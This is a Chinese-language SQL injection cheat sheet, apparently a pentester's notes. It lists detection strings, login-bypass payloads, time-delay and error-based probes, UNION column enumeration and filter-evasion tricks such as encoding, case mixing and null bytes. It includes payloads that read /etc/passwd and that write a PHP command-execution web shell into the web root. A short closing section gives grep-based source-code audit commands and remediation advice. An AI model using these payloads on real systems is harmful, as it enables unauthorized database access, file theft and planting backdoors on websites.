' //单引号报错,转义 %bf%5c%27 //宽字节注入,数据库编码为GBK时,%bf%5c认为是一个字节,绕过PHP正则 UNION ALL SELECT LOAD_FILE('/etc/passwd')-- //读取系统文件 UNION SELECT "<?system($_REQUEST['cmd'];?>)" INTO OUTFILE "/var/www/html/127.0.0.1"-- // 写入后门
and 1=1 和 and 1=2 //数字类型注入条件判断 原理:+1 和 -1 编码后://经测试,需要编码后测试 %2B1为+1,-1为-1,-号编码后也是-所以直接用-号测试好了
hacker 和 hack' + 'er 或 hack er //字符型注入条件判断 ' and '1'='1 和 ' and '1'='2 //同上
#检测构造的时候,如果发现跳转页面,比如首页。会有两种情况存在; #1、后台判断参数化查询,如果不符合参数类型则跳转,不存在注入漏洞 #2、后台判断是否正常返回记录值,如果没有则跳转,存在注入漏洞
and 1=0/@@version;-- //字符串转化为整数 看版本 and 1=0/user;-- //字符串转化为整数 看当前数据库用户
1' GROUP BY productid having 1'='1 //枚举所有列 1' and USER not in ('admin') and 1=0/USER and 1'='1 //判断当前账户权限,是否为管理员
常用内联测试字符串及变形: 字符型 1' or '1'='1 1') or ('1'='1 value' or '1'='2 value') or ('1'='2 1'and '1'='1 1') and ('1'='1 1' or 'ab'='a'+'b' 1') or ('ab'='a'+'b') 1' or 'ab'='a'b 1') or ('ab'='a'b) 1' or 'ab'='a'||'b 1') or ('ab'='a'||'b 数字型 1+1 3-1 value+0 1 or 1=1
- or (1=1 value or? 1=2 value) or (1=2 1 and 1=2
- and (1=2 1 or 'ab'='a'+'b'
- or ('ab'='a'+'b' 1 or 'ab'='a''b'
- or? ('ab'='a''b' 1 or 'ab'='a'||'b'
- or ('ab'='a'||'b'
登陆弱口令 admin'-- admin')-- admin'# admin')# 1-- 1)-- 1 or 1=1--
- or 1=1-- 'or '1'='1'-- ') or '1'='1'-- -1 and 1=2-- -1) and 1=2-- 'and '1'='2'-- ') and '1'='2'-- 1/comment/
microsoft sql 时间延迟 aspx?id=1; waitfor delay '0:0:5';--
mysql 时间延迟 php?id=1; select benchmark(10000000,encode('hello','mom');--
利用篇 @@version #DBMS版本 @@servername #安装SQL server服务器名称 @@language #当前使用语言 @@spid #当前用户进程ID
11+union+select+null,null,null,null-- 嗅探列数 11+order+by+6 排序方式实现嗅探列数,实际列数 6-1=5列 #排序方式实现结合 二分法算法实现 可提高效率 #UNION对已知表数据查询速度会更快一些
asp?id=12;if+(system_user='sa')+WAITFOR+DELAY+'0:0:5'-- mssql判断是否为dba权限 select len(system_user) 获取用户名长度
绕过技术: 1.随机大小写绕过 SeLect 2.URL编码绕过 '%2f%2a*/UNION%2f%2a*/password%2f%2a*/FROM%2f%2a*/table_User%2f%2a*/... 3.双URL编码绕过 %252f%%252a*/UNION%252f%%252a*/... 4.动态查询绕过 Oracle:'SELE'||'ct' 编码后 'SELE'%20'ct' MS-SQL:'SELE'+'ct' 编码后 'SELE'%2B'ct' Mysql:'SELE'+'ct' 编码后 'SELE'%2B'ct' 5.ASCII码编码绕过 char() 6.使用空字节 %00' UNION SELECT password FROM table_User WHERE username='admin'-- 7.嵌套剥离后的表达式 比如SELECTSELECT,只过滤了其中一个 8.利用截断 单引号或双引号或扩展闭合截断 9.GET,POST方式切换
/**/ 单行注释 --? 多行注释
mysql单行注释符
SELECT 1 /!40119 + 1/ 加!号后,如果当前数据库版本等于大于4.01.19则代码被执行
value//or//1=1?? //空格绕过
审计技术
grep -r -n "(mysql|mssql|mysql_db)query(.*$(GET|POST).*)" src/ | awk -F : '{print "filename:"$1"\n line: "$2"\n match: "$3"\n\n"}'
#对文件目录遍历,src为路径,php版 grep -r -n "(oci|ora)parse(.*$(GET|POST).*)" src/ | awk -F : '{print "filename:"$1"\n line: "$2"\n match: "$3"\n\n"}'
#java版 grep -r -n "preparedStatement(|executeQuery(|executeUpdate(|execute(|addBatch(|executeBatch(" src/ | awk -F : '{print "filename:"$1"\n line: "$2"\n match: "$3"\n\n"}'
#C#版 grep -r -n "SqlCommand(|SqlParameter(|OleDbCommand(|OleDbparameter(\OracleCommand(|OracleParameter(|\OdbcCommand(|Odbcparameter" src/ | awk -F : '{print "filename:"$1"\n line: "$2"\n match: "$3"\n\n"}' #查是否存在注入点 grep -i -r -n "sql =.*"(SELECT|UPDATE|INSERT|DROP)" src/ | awk -F : '{print "filename:"$1"\n line: "$2"\n match: "$3"\n\n"}'
注入类型: 1.时间延迟注入 aspx?id=1; waitfor delay '0:0:5';-- 分割sql语句,前面sql语句如果为假,则执行后面语句 waitfor delay '0:0:5';-- 判断返回时间是否延迟了5秒 2.基于错误注入 asp?id=1/is_srvrolemember('sysadmin') 上述构造是利用返回错误,反推构造sql条件 3.基于内容 asp?id=2、asp?id=2-1、asp?id=2%2B1(asp?id=2+1)、 利用返回内容,测试是否存在sql注入,后面可以写为其他条件
修复漏洞: 输入验证,即参数化查询,强制数据类型及字符串长度控制。 数据类型、数据大小、数据范围、数据内容 正则过滤,白名单正则(不推荐黑名单正则,世面一般都是用的黑名单正则)
